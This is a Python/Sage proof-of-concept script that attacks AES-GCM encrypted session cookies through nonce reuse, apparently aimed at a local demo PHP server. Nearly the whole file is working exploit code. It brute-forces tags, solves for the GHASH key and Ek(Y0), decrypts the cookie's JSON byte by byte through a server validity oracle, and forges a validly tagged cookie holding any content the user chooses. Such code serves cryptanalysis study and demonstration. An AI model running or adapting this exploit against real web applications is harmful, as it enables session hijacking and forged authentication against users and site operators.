import sys
import json
import base64
import argparse
import binascii
import requests

from sage.all import *
from urllib.parse import quote, unquote, urlparse, parse_qs

########### NONCE REUSE MATH CODE ############################
def split_data(data, block_size):
    return [data[i:i + (block_size * 2)].ljust(block_size * 2, '0') for i in range(0, len(data), block_size * 2)]

# Data is still hex-encoded here
def build_blocks(aad, ct, block_size=16):
    blocks = split_data(aad, block_size) + split_data(ct, block_size)

    aad = binascii.unhexlify(aad)
    ct = binascii.unhexlify(ct)

    # Length is in bits
    aad_len = len(aad) * 8
    ct_len = len(ct) * 8

    len_block = hex(aad_len)[2:].zfill(block_size) + hex(ct_len)[2:].zfill(block_size)
    blocks.append(len_block)
    return blocks

def gen_monom(block, x, block_size=16):
    monom = 0

    bin_block = bin(int(block, 16))[2:].zfill(block_size * 8)
    for j, b in enumerate(bin_block):
        if b == '1':
            monom += x ** j

    return monom

def gen_polynomial(blocks, H, x, block_size=16):
    poly = 0
    for i, block in enumerate(blocks):
        monom = gen_monom(block, x, block_size)
        monom *= H ** (len(blocks) - i)
        poly += monom
    return poly

def hex_encode_polynomial(root, bin_key_size=128):
    root = str(root)
    key_bits = ['0'] * bin_key_size
    monoms = root.split(' + ')
    for monom in monoms:
        if 'x' in monom:
            exponent = monom.replace('x^', '')
            if exponent == 'x':
                exponent = '1'

            key_bits[int(exponent)] = '1'
        else: # means monoms == '1'
            key_bits[0] = '1'

    return hex(int(''.join(key_bits), 2))[2:].zfill(bin_key_size // 4)

def left_pad_with_null_blocks(blocks, needed_count):
    return ['0'] * (needed_count - len(blocks)) + blocks

def xor_blocks(blocks1, blocks2, block_size=16):
    xored_blocks = []

    if len(blocks1) > len(blocks2):
        blocks2 = left_pad_with_null_blocks(blocks2, len(blocks1))
    elif len(blocks1) < len(blocks2):
        blocks1 = left_pad_with_null_blocks(blocks1, len(blocks2))

    for i, block1 in enumerate(blocks1):
        block2 = blocks2[i]

        block1 = int(block1, 16)
        block2 = int(block2, 16)

        xored_block = block1 ^ block2

        xored_blocks.append(hex(xored_block)[2:].zfill(block_size * 2))

    return xored_blocks

def ghash(aad, ct, ghash_key):
    F = GF(2)['a']
    (a,) = F._first_ngens(1)
    
    F = GF(2 **128 , modulus=a**128  + a**7  + a**2  + a + 1 , names=('x',))
    (x,) = F._first_ngens(1)
    
    R = PolynomialRing(F, names=('H',))
    (H,) = R._first_ngens(1)
    
    #F.<a> = GF(2)[]
    #F.<x> = GF(2^128, modulus=a^128 + a^7 + a^2 + a + 1)
    #R.<H> = PolynomialRing(F)

    blocks = build_blocks(aad, ct)
    p = gen_polynomial(blocks, ghash_key, x)
    return p

def resolve_ghash_key(aad_tag_ct_1, aad_tag_ct_2):
    F = GF(2)['a']
    (a,) = F._first_ngens(1)
    
    F = GF(2 **128 , modulus=a**128  + a**7  + a**2  + a + 1 , names=('x',))
    (x,) = F._first_ngens(1)
    
    R = PolynomialRing(F, names=('H',))
    (H,) = R._first_ngens(1)
    
    #F.<a> = GF(2)[]
    #F.<x> = GF(2^128, modulus=a^128 + a^7 + a^2 + a + 1)
    #R.<H> = PolynomialRing(F)

    aad1, tag1, ct1 = aad_tag_ct_1.split(':')
    aad2, tag2, ct2 = aad_tag_ct_2.split(':')

    blocks1 = build_blocks(aad1, ct1)
    blocks2 = build_blocks(aad2, ct2)

    xored_blocks = xor_blocks(blocks1, blocks2)

    poly_xored = gen_polynomial(xored_blocks, H, x)

    i_tag1 = int(tag1, 16)
    i_tag2 = int(tag2, 16)
    tag_xored = i_tag1 ^ i_tag2
    tag_xored = hex(tag_xored)[2:].zfill(32)

    tag = gen_monom(tag_xored, x)
    eq = poly_xored + tag

    roots = (eq).roots()
    return roots

def resolve_nonce_reuse(aad_tag_ct_1, aad_tag_ct_2):
    F = GF(2)['a']
    (a,) = F._first_ngens(1)
    
    F = GF(2 **128 , modulus=a**128  + a**7  + a**2  + a + 1 , names=('x',))
    (x,) = F._first_ngens(1)
    
    R = PolynomialRing(F, names=('H',))
    (H,) = R._first_ngens(1)
    
    #F.<a> = GF(2)[]
    #F.<x> = GF(2^128, modulus=a^128 + a^7 + a^2 + a + 1)
    #R.<H> = PolynomialRing(F)

    aad1, tag1, ct1 = aad_tag_ct_1.split(':')
    roots = resolve_ghash_key(aad_tag_ct_1, aad_tag_ct_2)

    ghash_key_eky0_pairs = []
    for potential_ghash_key, _ in roots:
        result = hex_encode_polynomial(ghash(aad1, ct1, potential_ghash_key))

        i_result = int(result, 16)
        i_tag1 = int(tag1, 16)

        potential_ek_y0 = i_result ^ i_tag1
        potential_ek_y0 = hex(potential_ek_y0)[2:].zfill(32)
        potential_ek_y0 = gen_monom(potential_ek_y0, x)

        encoded_ghash_key = hex_encode_polynomial(potential_ghash_key)
        encoded_ek_y0 = hex_encode_polynomial(potential_ek_y0)
        ghash_key_eky0_pairs.append((encoded_ghash_key, encoded_ek_y0))

    return ghash_key_eky0_pairs

def compute_tag(wanted_aad_ct, ghash_key, ek_y0):
    F = GF(2)['a']
    (a,) = F._first_ngens(1)
    
    F = GF(2 **128 , modulus=a**128  + a**7  + a**2  + a + 1 , names=('x',))
    (x,) = F._first_ngens(1)
    
    R = PolynomialRing(F, names=('H',))
    (H,) = R._first_ngens(1)
    
    #F.<a> = GF(2)[]
    #F.<x> = GF(2^128, modulus=a^128 + a^7 + a^2 + a + 1)
    #R.<H> = PolynomialRing(F)

    ghash_key = gen_monom(ghash_key, x)
    ek_y0 = gen_monom(ek_y0, x)

    aad, ct = wanted_aad_ct.split(':')
    tag = ghash(aad, ct, ghash_key) + ek_y0

    return hex_encode_polynomial(tag)
########### END NONCE REUSE MATH CODE ########################

def xor(s1, s2):
    if type(s1) == str:
        s1 = s1.encode('utf-8')

    if type(s2) == str:
        s2 = s2.encode('utf-8')

    return bytes([c ^ s2[i % len(s2)] for i, c in enumerate(s1)])

def get_occurrences_indexes(haystack, needle):
    indexes = []

    location = 0
    index = haystack[location:].find(needle)
    while index != -1:
        indexes.append(index + location)
        location += index + 1
        index = haystack[location:].find(needle)

    return indexes

## Parts unknown should be replaced by null bytes in to_replace
def replace_occurrences(known_plaintext, ciphertext, to_replace, replace_by):
    for index in get_occurrences_indexes(known_plaintext, to_replace):
        xor_nullify_sequence = b'\x00' * index + to_replace
        xor_nullify_sequence += b'\x00' * (len(ciphertext) - len(xor_nullify_sequence))
        nullified_ciphertext = xor(ciphertext, xor_nullify_sequence)

        xor_flip_sequence = xor_nullify_sequence.replace(to_replace, replace_by)
        ciphertext = xor(nullified_ciphertext, xor_flip_sequence)
    return ciphertext

def get_valid_tag(nonce, ciphertext, tag_len_wanted=1, h_key_eky0=None):
    if h_key_eky0 == None:
        return bruteforce_tag(nonce, ciphertext, tag_len_wanted=tag_len_wanted)
    else:
        ghash_key, eky0 = h_key_eky0
        
        tag = compute_tag(
            ':{}'.format(binascii.hexlify(ciphertext).decode()),
            ghash_key,
            eky0
        )
        return binascii.unhexlify(tag)

def bruteforce_tag(nonce, ciphertext, tag_len_wanted=1):
    tag = b''
    for _ in range(tag_len_wanted):
        for tag_byte in range(256):
            tmp_tag = tag + bytes([tag_byte])
            print_progress("Bruteforcing tag: " + binascii.hexlify(tmp_tag).decode())
            if is_valid_tag(nonce, ciphertext, tmp_tag):
                tag = tmp_tag
                break

    print() # Add a new line
    return tag

def get_and_extend_keystream(known, nonce, ciphertext, h_key_eky0, wanted_len):
    keystream = xor(known, ciphertext[:len(known)])
    while len(keystream) < wanted_len:
        # Making ciphertext longer and longer to make known longer and longer
        if len(known) == len(ciphertext):
            ciphertext += b'A' # Adding A's for pwning traditions
        known = decrypt_json(known, nonce, ciphertext, h_key_eky0, show_keystream_progress=True)
        keystream = xor(known, ciphertext[:len(known)])
    
    print() # Adding a new line
    return keystream[:wanted_len]

def decrypt_json(known, nonce, ciphertext, h_key_eky0, show_keystream_progress=False):
    for i in range(len(known), len(ciphertext)):
        for guess in range(256):
            to_replace = known + bytes([guess])
            replace_by = b'{' + b' ' * (len(known) - 1) + b'}'

            # Keeping only necessary bytes to create empty object "{}"
            shortened_ciphertext = ciphertext[:len(known) + 1]
            mod_ciphertext = replace_occurrences(to_replace, shortened_ciphertext, to_replace, replace_by)
            
            if not show_keystream_progress:
                progress = known.decode() + hex(guess)[2:].zfill(2)
            else:
                progress = binascii.hexlify(xor(to_replace, ciphertext)).decode()
            print_progress(progress)
                
            tag = get_valid_tag(nonce, mod_ciphertext, h_key_eky0=h_key_eky0)
            if is_ciphertext_valid(nonce, mod_ciphertext, tag):
                known = to_replace
                break
    if not show_keystream_progress:
        print() # Adding a new line
    return known

####################### EXPLOITED DEPENDANT CODE ########################

def is_valid_tag(nonce, ciphertext, tag):
    global sess, url
    
    http_proxy  = "http://127.1:8080"
    https_proxy = "https://127.1:8080"
    
    proxies = {
                  "http"  : http_proxy,
                  "https" : https_proxy,
                }

    sess_cookie = pack_cookie(nonce, ciphertext, tag)
    sess.cookies.set('session', None)
    sess.cookies.set('session', sess_cookie)
    
    r = sess.get(url)#, proxies=proxies)
   
    return r.headers.get('Set-Cookie', 'nope') == 'nope'

## Works as validity oracle
# detection whether it's invalid tag or invalid ciphertext can be difficult
# Either timing or specific errors
# If no tag works, ciphertext is most likely invalid
def is_ciphertext_valid(nonce, ciphertext, tag):
    global sess, url
    
    http_proxy  = "http://127.1:8080"
    https_proxy = "https://127.1:8080"
    
    proxies = {
                  "http"  : http_proxy,
                  "https" : https_proxy,
                }

    sess_cookie = pack_cookie(nonce, ciphertext, tag)
    sess.cookies.set('session', None)
    sess.cookies.set('session', sess_cookie)
    
    r = sess.get(url)#, proxies=proxies)
   
    return r.status_code == 200

def pack_cookie(nonce, ciphertext, tag):
    return base64.b64encode(nonce + base64.b64encode(ciphertext) + tag).decode()

####################### END EXPLOITED DEPENDANT CODE ####################

def print_progress(value):
    print(value, end='\r')

if __name__ == '__main__':
    parser = argparse.ArgumentParser(description = 'PoC for decryption and forgery of AES-GCM encrypted cookie.\nUsage: sage -python this_script.py -c cookie -f wanted_forged_cookie')
    parser.add_argument('-c', '--cookie', type=str, help='Original cookie as received from the server', required=True)
    parser.add_argument('-f', '--wanted_forgery', type=str, help='The string you want the server to get after decryption', required=True)
    args = parser.parse_args()
    
    print(' =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=')
    print(' ===== PoC for decryption and forgery of AES-GCM encrypted cookie =====')
    print(' =--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=')
    print()

    cookie = base64.b64decode(unquote(args.cookie))
    nonce = cookie[:12]
    ciphertext = base64.b64decode(cookie[12:-16])
    tag = cookie[-16:]
    
    print('Nonce: ', binascii.hexlify(nonce))
    print('Ciphertext: ', binascii.hexlify(ciphertext))
    print('Tag: ', binascii.hexlify(tag))
    print('-' * 80)

    url = 'http://localhost:8888/demo_server.php'
    sess = requests.Session()
    
    ## -------------------------------------------------------------------------
    ## 1. Create empty ciphertext and bruteforce tag
    empty_ciphertext = b''
    new_tag = bruteforce_tag(nonce, empty_ciphertext, tag_len_wanted=16)
    #new_tag = binascii.unhexlify('1ccdefebff9dd71d12d4f0dc53700848')
    print('Found new tag:', binascii.hexlify(new_tag).decode())
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 2. Change {"... to "{}" + tag
    known = b'{"'
    to_replace = b'{"'
    replace_by = b'{}'
    shortened_ciphertext = ciphertext[:2] # Only 2 bytes are needed to have the empty object "{}"
    
    print('Modifying the known ciphertext start from \'{"...\' to \'{}\'')
    mod_ciphertext = replace_occurrences(known, shortened_ciphertext, to_replace, replace_by)
    
    print('Modified ciphertext:', binascii.hexlify(mod_ciphertext))
    print('-' * 80)
    
    ## -------------------------------------------------------------------------
    ## 3. Compute ghash key and get potential solutions for mod_ciphertext
    empty_aad = b''

    # resolve_nonce_reuse and compute_tag expect ciphertexts in the format
    # "hex_encoded(aad):hex_encoded(tag):hex_encoded(ciphertext)"
    original_ct = empty_aad + b':' + binascii.hexlify(tag) + b':' + binascii.hexlify(ciphertext)
    empty_ct = empty_aad + b':' + binascii.hexlify(new_tag) + b':'

    print('Computing candidate GHASH key and Ek(y0) pairs...')
    
    ghash_key_eky0_pairs = resolve_nonce_reuse(original_ct.decode(), empty_ct.decode())
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 4. Find valid solution
    print('Calculating candidate tags and testing on the server...')
    
    wanted_ct = b':' + binascii.hexlify(mod_ciphertext)
    for candidate_ghash_key, candidate_eky0 in ghash_key_eky0_pairs:
        candidate_tag = compute_tag(wanted_ct.decode(), candidate_ghash_key, candidate_eky0)
        if is_valid_tag(nonce, mod_ciphertext, binascii.unhexlify(candidate_tag)):
            print('Found GHASH key and the associated Ek(y0)!')
            ghash_key = candidate_ghash_key
            eky0 = candidate_eky0 # Encrypted Y0 -> Y0 being nonce + first iteration of counter
            print('GHASH key:', ghash_key)
            print('Ek(Y0):', eky0)
            break

    ghash_key_eky0 = (ghash_key, eky0)
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 5. Decrypt by changing {"... to "{ }" + tag (repeat)
    print('Decrypting the JSON string...')
    known = b'{"'
    plain = decrypt_json(known, nonce, ciphertext, ghash_key_eky0)
    #plain = b'{"username":"Guest","secret":"something_to_show_decryption"}'
    print('Successfully decrypted ciphertext:', plain)
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 6. Extend keystream for length needed
    print('Extending known keystream...')
    forgery = args.wanted_forgery
    keystream = get_and_extend_keystream(plain, nonce, ciphertext, ghash_key_eky0, len(forgery))
    
    print('-' * 80)

    ## -------------------------------------------------------------------------
    ## 7. Bitflip wanted cookie and output
    print('Forging valid ciphertext for wanted forgery...')
    forged_ct = xor(forgery, keystream)
    formatted_ct = b':' + binascii.hexlify(forged_ct) # Formatting for compute_tag which expects "hex(aad):hex(ciphertext)"
    tag = binascii.unhexlify(compute_tag(formatted_ct.decode(), ghash_key, eky0))
    sess_cookie = pack_cookie(nonce, forged_ct, tag)
    print('Wanted forgery:', forgery)
    print('Forged cookie:', sess_cookie)

